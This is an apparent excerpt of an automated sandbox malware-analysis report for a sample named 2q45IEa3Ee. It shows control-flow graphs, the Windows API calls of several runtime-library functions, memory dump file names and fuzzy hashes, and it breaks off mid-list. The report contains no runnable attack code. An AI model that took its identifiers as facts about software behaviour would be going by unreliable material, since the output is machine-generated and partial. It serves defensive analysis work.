                                                                                                                                              control_flow_graph 1751 ca4019-ca403b 1752 ca422e 1751->1752 1753 ca4041-ca4043 1751->1753 1756 ca4230-ca4234 1752->1756 1754 ca406f-ca4092 1753->1754 1755 ca4045-ca4064 call c93473 1753->1755 1758 ca4098-ca409e 1754->1758 1759 ca4094-ca4096 1754->1759 1762 ca4067-ca406a 1755->1762 1758->1755 1761 ca40a0-ca40b1 1758->1761 1759->1758 1759->1761 1763 ca40b3-ca40b9 call c9cecd 1761->1763 1764 ca40c4-ca40d4 call ca3b5e 1761->1764 1762->1756 1768 ca40be-ca40c1 1763->1768 1769 ca411d-ca412f 1764->1769 1770 ca40d6-ca40dc 1764->1770 1768->1764 1773 ca4131-ca4137 1769->1773 1774 ca4186-ca41a6 WriteFile 1769->1774 1771 ca40de-ca40e1 1770->1771 1772 ca4105-ca411b call ca372f 1770->1772 1775 ca40ec-ca40fb call ca3af6 1771->1775 1776 ca40e3-ca40e6 1771->1776 1794 ca40fe-ca4100 1772->1794 1780 ca4139-ca413c 1773->1780 1781 ca4172-ca4184 call ca3bdb 1773->1781 1778 ca41a8-ca41ae GetLastError 1774->1778 1779 ca41b1 1774->1779 1775->1794 1776->1775 1782 ca41c6-ca41c9 1776->1782 1778->1779 1786 ca41b4-ca41bf 1779->1786 1787 ca415e-ca4170 call ca3d9f 1780->1787 1788 ca413e-ca4141 1780->1788 1801 ca4159-ca415c 1781->1801 1789 ca41cc-ca41ce 1782->1789 1795 ca4229-ca422c 1786->1795 1796 ca41c1-ca41c4 1786->1796 1787->1801 1788->1789 1790 ca4147-ca4154 call ca3cb6 1788->1790 1797 ca41fc-ca4208 1789->1797 1798 ca41d0-ca41d5 1789->1798 1790->1801 1794->1786 1795->1756 1796->1782 1804 ca420a-ca4210 1797->1804 1805 ca4212-ca4224 1797->1805 1802 ca41ee-ca41f7 call c9bf58 1798->1802 1803 ca41d7-ca41e9 1798->1803 1801->1794 1802->1762 1803->1762 1804->1752 1804->1805 1805->1762
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,00DD8C88,00000014,00C9BE32,00000000,00000000,00000000), ref: 00CA419E
                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CA41A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 442123175-0
                                                                                                                                              • Opcode ID: c3dd90701bacb894f6f8daad923707f8eaf5332de94dfb1f77f5fa85f3e65d37
                                                                                                                                              • Instruction ID: 80e69657d6faa665b52012e43fed30cd62d6f819d3ad7f25d8cd09c8d3a69340
                                                                                                                                              • Opcode Fuzzy Hash: c3dd90701bacb894f6f8daad923707f8eaf5332de94dfb1f77f5fa85f3e65d37
                                                                                                                                              • Instruction Fuzzy Hash: 9C61E47190021BAFDF15DFA8DC84EEEBBB9AF8A308F140145F914A7251D7B2DA41DB60
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CA58AA Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1820 ca58aa-ca58b3 1821 ca58e2-ca58e3 1820->1821 1822 ca58b5-ca58c8 RtlFreeHeap 1820->1822 1822->1821 1823 ca58ca-ca58e1 GetLastError call c9bef2 call c9bf8f 1822->1823 1823->1821
                                                                                                                                              APIs
                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00CAC3D9,?,00000000,?,?,00CAC67A,?,00000007,?,?,00CACB6E,?,?), ref: 00CA58C0
                                                                                                                                              • GetLastError.KERNEL32(?,?,00CAC3D9,?,00000000,?,?,00CAC67A,?,00000007,?,?,00CACB6E,?,?), ref: 00CA58CB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                              • Opcode ID: d6455fd670f8d98d3cc94efd809d182981f9cb8de2440be050de0d33e431989f
                                                                                                                                              • Instruction ID: 4a0421971163a983797b0448e60d0307a506d8c1c9b8a0874f9f264d334f37f3
                                                                                                                                              • Opcode Fuzzy Hash: d6455fd670f8d98d3cc94efd809d182981f9cb8de2440be050de0d33e431989f
                                                                                                                                              • Instruction Fuzzy Hash: C0E086311407156BCB113FB4EC0DBA57BA8AB40355F508461FA0DCA1A0CB348D50EB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CA368F Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1828 ca368f-ca36a3 call ca91ce 1831 ca36a9-ca36b1 1828->1831 1832 ca36a5-ca36a7 1828->1832 1834 ca36bc-ca36bf 1831->1834 1835 ca36b3-ca36ba 1831->1835 1833 ca36f7-ca3717 call ca913d 1832->1833 1843 ca3729 1833->1843 1844 ca3719-ca3727 call c9bf58 1833->1844 1838 ca36dd-ca36ed call ca91ce CloseHandle 1834->1838 1839 ca36c1-ca36c5 1834->1839 1835->1834 1837 ca36c7-ca36db call ca91ce * 2 1835->1837 1837->1832 1837->1838 1838->1832 1847 ca36ef-ca36f5 GetLastError 1838->1847 1839->1837 1839->1838 1849 ca372b-ca372e 1843->1849 1844->1849 1847->1833
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,CF830579,?,00CA3576,00000000,CF830579,00DD8C68,0000000C,00CA3632,00C9790D,?), ref: 00CA36E5
                                                                                                                                              • GetLastError.KERNEL32(?,00CA3576,00000000,CF830579,00DD8C68,0000000C,00CA3632,00C9790D,?), ref: 00CA36EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                              • Opcode ID: db0a6643671254c03342c8aaa03375c426b3c2933fbbd04fcee703b7ca269c46
                                                                                                                                              • Instruction ID: 20e506998834173046506a091c5f2905b35e8dfb90d966c7ee63cea5c45e9cb6
                                                                                                                                              • Opcode Fuzzy Hash: db0a6643671254c03342c8aaa03375c426b3c2933fbbd04fcee703b7ca269c46
                                                                                                                                              • Instruction Fuzzy Hash: 361148326042972AD6112374AD5AF7D2759AB8377CF240249FA28DB3D2DE71CE809160
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C85390 Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2002 c85390-c853a1 2003 c854ac call c63750 2002->2003 2004 c853a7-c853c7 2002->2004 2009 c854b1-c854df call c93500 2003->2009 2006 c853cd-c853d2 2004->2006 2007 c854a7 call c63070 2004->2007 2010 c853d8-c853dd 2006->2010 2011 c853d4-c853d6 2006->2011 2007->2003 2023 c854e5-c854fd 2009->2023 2024 c855b6 call c63750 2009->2024 2010->2007 2013 c853e3-c853f1 2010->2013 2011->2013 2015 c8541a-c8541c 2013->2015 2016 c853f3-c853f8 2013->2016 2017 c8542b 2015->2017 2018 c8541e-c85429 call c8df02 2015->2018 2016->2007 2020 c853fe-c85409 call c8df02 2016->2020 2022 c8542d-c85438 2017->2022 2018->2022 2020->2009 2033 c8540f-c85418 2020->2033 2028 c85449-c8545f call c8fcc0 2022->2028 2029 c8543a-c85446 call c90240 2022->2029 2030 c854ff-c85504 2023->2030 2031 c85525-c85535 2023->2031 2039 c855bb 2024->2039 2052 c8548d-c854a4 2028->2052 2053 c85461-c8546f 2028->2053 2029->2028 2038 c85509-c8550a call c8df02 2030->2038 2035 c85540-c85542 2031->2035 2036 c85537-c8553c 2031->2036 2033->2022 2045 c85551 2035->2045 2046 c85544-c85545 call c8df02 2035->2046 2036->2039 2044 c8553e 2036->2044 2048 c8550f-c85514 2038->2048 2041 c855c0-c855e1 call c93500 2039->2041 2042 c855bb call c63070 2039->2042 2069 c8569f-c856a4 call c63750 2041->2069 2070 c855e7-c85608 2041->2070 2042->2041 2044->2038 2049 c85553-c85568 2045->2049 2058 c8554a-c8554f 2046->2058 2048->2041 2054 c8551a-c85523 2048->2054 2055 c85579-c85599 call c8fcc0 * 2 2049->2055 2056 c8556a-c85577 call c8fcc0 2049->2056 2059 c85471-c8547f 2053->2059 2060 c85483-c8548a call c8e183 2053->2060 2054->2049 2072 c8559c-c855b3 call c839d0 2055->2072 2056->2072 2058->2049 2059->2009 2061 c85481 2059->2061 2060->2052 2061->2060 2074 c8560a-c8560f 2070->2074 2075 c85611-c85616 2070->2075 2076 c85619-c85652 call c880b0 call c856b0 call c8fcc0 2074->2076 2075->2076 2087 c85680-c85697 2076->2087 2088 c85654-c85662 2076->2088 2089 c85664-c85672 2088->2089 2090 c85676-c8567d call c8e183 2088->2090 2091 c8569a call c93500 2089->2091 2092 c85674 2089->2092 2090->2087 2091->2069 2092->2090
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C854A7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                              • Opcode ID: a42e5f811fb07c851d8a9d5f597e4e96a9635b1707289282c36b588c16d834e9
                                                                                                                                              • Instruction ID: d08928c98d3263ad3d6e0aea76a6c954d4285108b8e0abeece71df1827c82ebe
                                                                                                                                              • Opcode Fuzzy Hash: a42e5f811fb07c851d8a9d5f597e4e96a9635b1707289282c36b588c16d834e9
                                                                                                                                              • Instruction Fuzzy Hash: 6481E6726005059FC718EF7CC88586EB7A9EB84324724832DF826C7391EBB0EE55C794
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C719D0 Relevance: 1.7, APIs: 1, Instructions: 232COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2096 c719d0-c71a09 2097 c71a0f 2096->2097 2098 c71c8b-c71c9d 2096->2098 2099 c71a16-c71a6e call c8df02 * 2 call c89f40 2097->2099 2100 c71b66-c71b7d call c75a50 2097->2100 2101 c71bc5-c71c02 call c8df02 2097->2101 2102 c71b82-c71b94 2097->2102 2103 c71acf-c71b0f call c8df02 2097->2103 2104 c71baa-c71bc0 2097->2104 2105 c71b99-c71ba5 2097->2105 2135 c71a73-c71a87 2099->2135 2100->2098 2117 c71c74-c71c7f 2101->2117 2118 c71c04-c71c0a 2101->2118 2102->2098 2114 c71b11-c71b36 call c86ca0 2103->2114 2115 c71b5e-c71b61 2103->2115 2104->2098 2105->2098 2133 c71b5b 2114->2133 2134 c71b38-c71b3a 2114->2134 2119 c71c85-c71c88 2115->2119 2121 c71c82 2117->2121 2123 c71ca0 call c63750 2118->2123 2124 c71c10-c71c16 2118->2124 2119->2098 2121->2119 2130 c71ca5 call c63070 2123->2130 2128 c71c3d-c71c43 call c8df02 2124->2128 2129 c71c18-c71c1d 2124->2129 2146 c71c46-c71c71 call c8fcc0 2128->2146 2129->2130 2131 c71c23-c71c30 call c8df02 2129->2131 2144 c71caa-c71caf call c93500 2130->2144 2131->2144 2152 c71c32-c71c3b 2131->2152 2133->2115 2141 c71b40-c71b43 call c719d0 2134->2141 2136 c71ac3-c71aca 2135->2136 2137 c71a89-c71a8f 2135->2137 2136->2121 2142 c71a91-c71a9b 2137->2142 2143 c71a9d-c71aab 2137->2143 2148 c71b48-c71b53 2141->2148 2142->2142 2142->2143 2149 c71aad 2143->2149 2150 c71abb-c71abe 2143->2150 2146->2117 2148->2141 2154 c71b55-c71b58 2148->2154 2155 c71ab0-c71ab9 2149->2155 2150->2121 2152->2146 2154->2133 2155->2150 2155->2155
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C71CA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                              • Opcode ID: 6ed3d5e7eec41d2d86bac0cfe5cd9e0af8e53e707e5919f4e84420ed3cc8ed5e
                                                                                                                                              • Instruction ID: 7d0b92b40940f4813a96d5c9d23f7a4be4c8ede197779361a968bacfda101208
                                                                                                                                              • Opcode Fuzzy Hash: 6ed3d5e7eec41d2d86bac0cfe5cd9e0af8e53e707e5919f4e84420ed3cc8ed5e
                                                                                                                                              • Instruction Fuzzy Hash: 0AA118B0900615DFCB05CFA9C484B99FBF0BF09314F28C1AAE85DAB352D775AA45CB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C854C0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C855BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
